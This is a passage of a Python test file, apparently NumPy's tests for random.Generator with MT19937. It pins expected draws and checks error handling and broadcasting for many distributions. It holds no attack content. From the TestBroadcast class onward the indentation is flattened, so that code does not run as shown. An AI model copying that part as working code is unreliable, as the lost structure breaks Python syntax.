    random = Generator(MT19937(self.seed))
    actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
    desired = np.array([[[1, 5, 1, 6, 4, 3],
                         [4, 2, 6, 2, 4, 2]],
                        [[5, 3, 2, 6, 3, 1],
                         [4, 4, 0, 2, 3, 7]],
                        [[6, 3, 1, 5, 3, 2],
                         [5, 5, 3, 1, 2, 4]]])
    assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
    # Pinned draws plus validation behavior for every decomposition method:
    # asymmetric / non-PSD / singular covariances, check_valid modes,
    # float32 covariance, and mean/cov shape errors.
    random = Generator(MT19937(self.seed))
    mean = (.123456789, 10)
    cov = [[1, 0], [0, 1]]
    size = (3, 2)
    actual = random.multivariate_normal(mean, cov, size, method=method)
    desired = np.array([[[-1.747478062846581,  11.25613495182354  ],
                         [-0.9967333370066214, 10.342002097029821 ]],
                        [[ 0.7850019631242964, 11.181113712443013 ],
                         [ 0.8901349653255224,  8.873825399642492 ]],
                        [[ 0.7130260107430003,  9.551628690083056 ],
                         [ 0.7127098726541128, 11.991709234143173 ]]])
    assert_array_almost_equal(actual, desired, decimal=15)
    # Check for default size, was raising deprecation warning
    actual = random.multivariate_normal(mean, cov, method=method)
    desired = np.array([0.233278563284287, 9.424140804347195])
    assert_array_almost_equal(actual, desired, decimal=15)
    # Check that non symmetric covariance input raises exception when
    # check_valid='raises' if using default svd method.
    mean = [0, 0]
    cov = [[1, 2], [1, 2]]
    assert_raises(ValueError, random.multivariate_normal, mean, cov,
                  check_valid='raise')
    # Check that non positive-semidefinite covariance warns with
    # RuntimeWarning (svd/eigh) but cholesky fails outright.
    cov = [[1, 2], [2, 1]]
    assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
    assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
                 method='eigh')
    assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
                  method='cholesky')
    # and that it doesn't warn with RuntimeWarning check_valid='ignore'
    assert_no_warnings(random.multivariate_normal, mean, cov,
                       check_valid='ignore')
    # and that it raises with RuntimeWarning check_valid='raises'
    assert_raises(ValueError, random.multivariate_normal, mean, cov,
                  check_valid='raise')
    assert_raises(ValueError, random.multivariate_normal, mean, cov,
                  check_valid='raise', method='eigh')
    # check degenerate samples from singular covariance matrix:
    # both components must coincide for svd/eigh; cholesky cannot
    # factor a singular matrix.
    cov = [[1, 1], [1, 1]]
    if method in ('svd', 'eigh'):
        samples = random.multivariate_normal(mean, cov, size=(3, 2),
                                             method=method)
        assert_array_almost_equal(samples[..., 0], samples[..., 1],
                                  decimal=6)
    else:
        assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
                      method='cholesky')
    # float32 covariance must not trigger spurious PSD warnings.
    cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
    with suppress_warnings() as sup:
        random.multivariate_normal(mean, cov, method=method)
        w = sup.record(RuntimeWarning)
        assert len(w) == 0
    mu = np.zeros(2)
    cov = np.eye(2)
    # Unknown check_valid value and mis-shaped mean/cov raise.
    assert_raises(ValueError, random.multivariate_normal, mean, cov,
                  check_valid='other')
    assert_raises(ValueError, random.multivariate_normal,
                  np.zeros((2, 1, 1)), cov)
    assert_raises(ValueError, random.multivariate_normal,
                  mu, np.empty((3, 2)))
    assert_raises(ValueError, random.multivariate_normal,
                  mu, np.eye(3))

@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
    # Loose sanity checks on sample mean and empirical covariance;
    # only designed to detect major errors, not fine accuracy.
    random = Generator(MT19937(self.seed))
    n_s = 1000
    mean = np.array([1, 2])
    cov = np.array([[2, 1], [1, 2]])
    s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
    s_center = s - mean
    cov_emp = (s_center.T @ s_center) / (n_s - 1)
    # these are pretty loose and are only designed to detect major errors
    assert np.all(np.abs(s_center.mean(-2)) < 0.1)
    assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
    # Pinned negative_binomial draws.
    random = Generator(MT19937(self.seed))
    actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
    desired = np.array([[543, 727],
                        [775, 760],
                        [600, 674]])
    assert_array_equal(actual, desired)

def test_negative_binomial_exceptions(self):
    # NaN p raises, scalar or vectorized.
    with np.errstate(invalid='ignore'):
        assert_raises(ValueError, random.negative_binomial, 100, np.nan)
        assert_raises(ValueError, random.negative_binomial, 100,
                      [np.nan] * 10)

def test_negative_binomial_p0_exception(self):
    # Verify that p=0 raises an exception.
    with assert_raises(ValueError):
        x = random.negative_binomial(1, 0)

def test_noncentral_chisquare(self):
    # Pinned draws for large df, tiny df (< 1), and the nonc=0 special
    # case, which reduces to a central chisquare.
    random = Generator(MT19937(self.seed))
    actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
    desired = np.array([[ 1.70561552362133, 15.97378184942111],
                        [13.71483425173724, 20.17859633310629],
                        [11.3615477156643 ,  3.67891108738029]])
    assert_array_almost_equal(actual, desired, decimal=14)
    actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
    desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
                        [1.14554372041263e+00, 1.38187755933435e-03],
                        [1.90659181905387e+00, 1.21772577941822e+00]])
    assert_array_almost_equal(actual, desired, decimal=14)
    random = Generator(MT19937(self.seed))
    actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
    desired = np.array([[0.82947954590419, 1.80139670767078],
                        [6.58720057417794, 7.00491463609814],
                        [6.31101879073157, 6.30982307753005]])
    assert_array_almost_equal(actual, desired, decimal=14)

def test_noncentral_f(self):
    # Pinned noncentral F draws.
    random = Generator(MT19937(self.seed))
    actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
                                 size=(3, 2))
    desired = np.array([[0.060310671139  , 0.23866058175939],
                        [0.86860246709073, 0.2668510459738 ],
                        [0.23375780078364, 1.88922102885943]])
    assert_array_almost_equal(actual, desired, decimal=14)

def test_noncentral_f_nan(self):
    # NaN noncentrality propagates to a NaN result rather than raising.
    random = Generator(MT19937(self.seed))
    actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
    assert np.isnan(actual)
def test_normal(self):
    # Pinned normal draws.
    random = Generator(MT19937(self.seed))
    actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
    desired = np.array([[-3.618412914693162, 2.635726692647081],
                        [-2.116923463013243, 0.807460983059643],
                        [ 1.446547137248593, 2.485684213886024]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_normal_0(self):
    # Degenerate scale; negative zero raises.
    assert_equal(random.normal(scale=0), 0)
    assert_raises(ValueError, random.normal, scale=-0.)

def test_pareto(self):
    # Pinned pareto draws, compared in nulps rather than decimals.
    random = Generator(MT19937(self.seed))
    actual = random.pareto(a=.123456789, size=(3, 2))
    desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
                        [7.2640150889064703e-01, 3.4650454783825594e+05],
                        [4.5852344481994740e+04, 6.5851383009539105e+07]])
    # For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
    # matrix differs by 24 nulps. Discussion:
    # https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
    # Consensus is that this is probably some gcc quirk that affects
    # rounding but not in any important way, so we just use a looser
    # tolerance on this test:
    np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)

def test_poisson(self):
    # Tiny lambda: pinned result is all zeros.
    random = Generator(MT19937(self.seed))
    actual = random.poisson(lam=.123456789, size=(3, 2))
    desired = np.array([[0, 0],
                        [0, 0],
                        [0, 0]])
    assert_array_equal(actual, desired)

def test_poisson_exceptions(self):
    # Negative, too-large, and NaN lambdas all raise.
    lambig = np.iinfo('int64').max
    lamneg = -1
    assert_raises(ValueError, random.poisson, lamneg)
    assert_raises(ValueError, random.poisson, [lamneg] * 10)
    assert_raises(ValueError, random.poisson, lambig)
    assert_raises(ValueError, random.poisson, [lambig] * 10)
    with np.errstate(invalid='ignore'):
        assert_raises(ValueError, random.poisson, np.nan)
        assert_raises(ValueError, random.poisson, [np.nan] * 10)

def test_power(self):
    # Pinned power-distribution draws.
    random = Generator(MT19937(self.seed))
    actual = random.power(a=.123456789, size=(3, 2))
    desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
                        [2.482442984543471e-10, 1.527108843266079e-01],
                        [8.188283434244285e-02, 3.950547209346948e-01]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_rayleigh(self):
    # Pinned rayleigh draws.
    random = Generator(MT19937(self.seed))
    actual = random.rayleigh(scale=10, size=(3, 2))
    desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
                        [ 4.19850651287094, 17.08718809823704],
                        [14.7907457708776 , 15.85545333419775]])
    assert_array_almost_equal(actual, desired, decimal=14)

def test_rayleigh_0(self):
    # Degenerate scale; negative zero raises.
    assert_equal(random.rayleigh(scale=0), 0)
    assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
    # Pinned standard Cauchy draws.
    random = Generator(MT19937(self.seed))
    actual = random.standard_cauchy(size=(3, 2))
    desired = np.array([[-1.489437778266206, -3.275389641569784],
                        [ 0.560102864910406, -0.680780916282552],
                        [-1.314912905226277,  0.295852965660225]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_standard_exponential(self):
    # Pinned draws for the inverse-CDF method (default is ziggurat).
    random = Generator(MT19937(self.seed))
    actual = random.standard_exponential(size=(3, 2), method='inv')
    desired = np.array([[0.102031839440643, 1.229350298474972],
                        [0.088137284693098, 1.459859985522667],
                        [1.093830802293668, 1.256977002164613]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_standard_expoential_type_error(self):
    # NOTE(review): method name typo ("expoential") kept — renaming would
    # change the test id. Integer dtypes are rejected.
    assert_raises(TypeError, random.standard_exponential, dtype=np.int32)

def test_standard_gamma(self):
    # Pinned standard gamma(shape=3) draws in float64.
    random = Generator(MT19937(self.seed))
    actual = random.standard_gamma(shape=3, size=(3, 2))
    desired = np.array([[0.62970724056362, 1.22379851271008],
                        [3.899412530884  , 4.12479964250139],
                        [3.74994102464584, 3.74929307690815]])
    assert_array_almost_equal(actual, desired, decimal=14)

def test_standard_gammma_scalar_float(self):
    # Scalar float32 draw pinned to float32 precision.
    random = Generator(MT19937(self.seed))
    actual = random.standard_gamma(3, dtype=np.float32)
    desired = 2.9242148399353027
    assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
    # float32 variant of test_standard_gamma.  Without an explicit dtype
    # this test duplicated the float64 path instead of covering float32;
    # decimal=5 is the float32-appropriate tolerance for these values.
    random = Generator(MT19937(self.seed))
    actual = random.standard_gamma(shape=3, size=(3, 2), dtype=np.float32)
    desired = np.array([[0.62971, 1.2238 ],
                        [3.89941, 4.1248 ],
                        [3.74994, 3.74929]])
    assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gammma_float_out(self):
    # Filling a caller-supplied float32 `out` buffer, with and without an
    # explicit matching size, gives identical pinned values.
    actual = np.zeros((3, 2), dtype=np.float32)
    random = Generator(MT19937(self.seed))
    random.standard_gamma(10.0, out=actual, dtype=np.float32)
    desired = np.array([[10.14987,  7.87012],
                        [ 9.46284, 12.56832],
                        [13.82495,  7.81533]], dtype=np.float32)
    assert_array_almost_equal(actual, desired, decimal=5)
    random = Generator(MT19937(self.seed))
    random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
    assert_array_almost_equal(actual, desired, decimal=5)

def test_standard_gamma_unknown_type(self):
    # Integer dtypes are rejected.
    assert_raises(TypeError, random.standard_gamma, 1.,
                  dtype='int32')

def test_out_size_mismatch(self):
    # `size` must agree with the shape of `out` when both are given.
    out = np.zeros(10)
    assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
                  out=out)
    assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
                  out=out)

def test_standard_gamma_0(self):
    # Degenerate shape; negative zero raises.
    assert_equal(random.standard_gamma(shape=0), 0)
    assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
    # Pinned standard normal draws.
    random = Generator(MT19937(self.seed))
    actual = random.standard_normal(size=(3, 2))
    desired = np.array([[-1.870934851846581, 1.25613495182354 ],
                        [-1.120190126006621, 0.342002097029821],
                        [ 0.661545174124296, 1.181113712443012]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_standard_normal_unsupported_type(self):
    # Integer dtypes are rejected.
    assert_raises(TypeError, random.standard_normal, dtype=np.int32)

def test_standard_t(self):
    # Pinned Student's t (df=10) draws.
    random = Generator(MT19937(self.seed))
    actual = random.standard_t(df=10, size=(3, 2))
    desired = np.array([[-1.484666193042647,  0.30597891831161 ],
                        [ 1.056684299648085, -0.407312602088507],
                        [ 0.130704414281157, -2.038053410490321]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_triangular(self):
    # Pinned triangular draws.
    random = Generator(MT19937(self.seed))
    actual = random.triangular(left=5.12, mode=10.23, right=20.34,
                               size=(3, 2))
    desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
                        [ 7.68152445215983, 14.36169131136546],
                        [13.16105603911429, 13.72341621856971]])
    assert_array_almost_equal(actual, desired, decimal=14)

def test_uniform(self):
    # Pinned uniform draws on [1.23, 10.54).
    random = Generator(MT19937(self.seed))
    actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
    desired = np.array([[2.13306255040998 , 7.816987531021207],
                        [2.015436610109887, 8.377577533009589],
                        [7.421792588856135, 7.891185744455209]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_uniform_range_bounds(self):
    # Ranges wider than a float64 can hold overflow; a range just inside
    # the representable span must succeed.
    fmin = np.finfo('float').min
    fmax = np.finfo('float').max
    func = random.uniform
    assert_raises(OverflowError, func, -np.inf, 0)
    assert_raises(OverflowError, func, 0, np.inf)
    assert_raises(OverflowError, func, fmin, fmax)
    assert_raises(OverflowError, func, [-np.inf], [0])
    assert_raises(OverflowError, func, [0], [np.inf])
    # (fmax / 1e17) - fmin is within range, so this should not throw
    # account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
    # DBL_MAX by increasing fmin a bit
    random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)

def test_scalar_exception_propagation(self):
    # Tests that exceptions are correctly propagated in distributions
    # when called with objects that throw exceptions when converted to
    # scalars.
    #
    # Regression test for gh: 8865
    class ThrowingFloat(np.ndarray):
        def __float__(self):
            raise TypeError
    throwing_float = np.array(1.0).view(ThrowingFloat)
    assert_raises(TypeError, random.uniform, throwing_float,
                  throwing_float)

    class ThrowingInteger(np.ndarray):
        def __int__(self):
            raise TypeError
    throwing_int = np.array(1).view(ThrowingInteger)
    assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)

def test_vonmises(self):
    # Pinned von Mises draws.
    random = Generator(MT19937(self.seed))
    actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
    desired = np.array([[ 1.107972248690106, 2.841536476232361],
                        [ 1.832602376042457, 1.945511926976032],
                        [-0.260147475776542, 2.058047492231698]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_vonmises_small(self):
    # check infinite loop, gh-4720: tiny kappa must still terminate
    # and produce finite values.
    random = Generator(MT19937(self.seed))
    r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
    assert_(np.isfinite(r).all())

def test_vonmises_nan(self):
    # NaN kappa propagates rather than raising.
    random = Generator(MT19937(self.seed))
    r = random.vonmises(mu=0., kappa=np.nan)
    assert_(np.isnan(r))

def test_wald(self):
    # Pinned Wald (inverse Gaussian) draws.
    random = Generator(MT19937(self.seed))
    actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
    desired = np.array([[0.26871721804551, 3.2233942732115 ],
                        [2.20328374987066, 2.40958405189353],
                        [2.07093587449261, 0.73073890064369]])
    assert_array_almost_equal(actual, desired, decimal=14)

def test_weibull(self):
    # Pinned Weibull draws.
    random = Generator(MT19937(self.seed))
    actual = random.weibull(a=1.23, size=(3, 2))
    desired = np.array([[0.138613914769468, 1.306463419753191],
                        [0.111623365934763, 1.446570494646721],
                        [1.257145775276011, 1.914247725027957]])
    assert_array_almost_equal(actual, desired, decimal=15)

def test_weibull_0(self):
    # a=0 degenerates to all zeros; negative zero raises.
    random = Generator(MT19937(self.seed))
    assert_equal(random.weibull(a=0, size=12), np.zeros(12))
    assert_raises(ValueError, random.weibull, a=-0.)

def test_zipf(self):
    # Pinned Zipf draws.
    random = Generator(MT19937(self.seed))
    actual = random.zipf(a=1.23, size=(3, 2))
    desired = np.array([[  1,   1],
                        [ 10, 867],
                        [354,   2]])
    assert_array_equal(actual, desired)
class TestBroadcast:
    # tests that functions that broadcast behave
    # correctly when presented with non-scalar arguments
    def setup(self):
        # Fixture seed shared by every test; `setup` is the nose-style
        # per-test hook that pytest invokes before each method.
        self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
